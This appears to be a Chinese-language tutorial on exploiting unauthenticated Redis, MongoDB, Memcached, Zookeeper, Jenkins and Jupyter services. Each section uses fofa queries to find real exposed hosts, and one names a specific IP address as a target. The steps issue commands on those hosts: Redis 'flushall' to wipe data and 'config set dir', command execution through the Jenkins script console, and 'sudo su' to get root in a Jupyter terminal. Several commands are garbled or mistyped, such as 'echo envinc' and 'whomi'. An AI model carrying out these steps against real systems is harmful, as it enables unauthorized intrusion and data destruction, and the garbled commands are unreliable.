一、Redis未授权访问漏洞
1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)
2.在kali里安装redis 命令为:apt install redis
3.安装成功后输入redis-cli -h ip地址 -p 6379,进入后输入info显示成功
#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用selectnum可以查看键值数据
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
二、MongoDB未授权访问漏洞
1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)
2.打开navicat进行连接连接名任意,主机填写找到的网址,点击测试连接,提示连接成功证明存在漏洞
三、Memcached未授权访问漏洞
Windows 下安装 Memcached | 菜鸟教程 下载64位1.4.5版本的
1.解压好在此目录打开命令行
2.在命令行输入memcached.exe -d install、memcached.exe -d start
3.打开kali输入telnet 存在漏洞的ip 11211进行telnet侦测
4.输入stats,查看memcache服务状态
5.使用Nmap程序的脚本进行漏洞扫描,nmap -p 11211 --script memcached-info ip地址
四、Zookeeper未授权访问漏洞
1.使用fofa搜索端口号为2181的网站
2.在kali中输入 echo envinc 114.242.175.75 2181 进行未授权访问漏洞测试
五、Jenkins未授权漏洞
1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
2.在打开的页面地址栏后加/manage/script/index.php进入
3.在其中输入println "'whoami".execute().text找到他的用户名
六、Jupyter NoteBook未授权访问漏洞
1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"
2.找到一个不需要密码的网站证明存在未授权访问漏洞,并且会直接跳到web管理界面
3.点击new-->termial新建一个终端
4.输入whomi、ls以及sudo su 进入root证明存在漏洞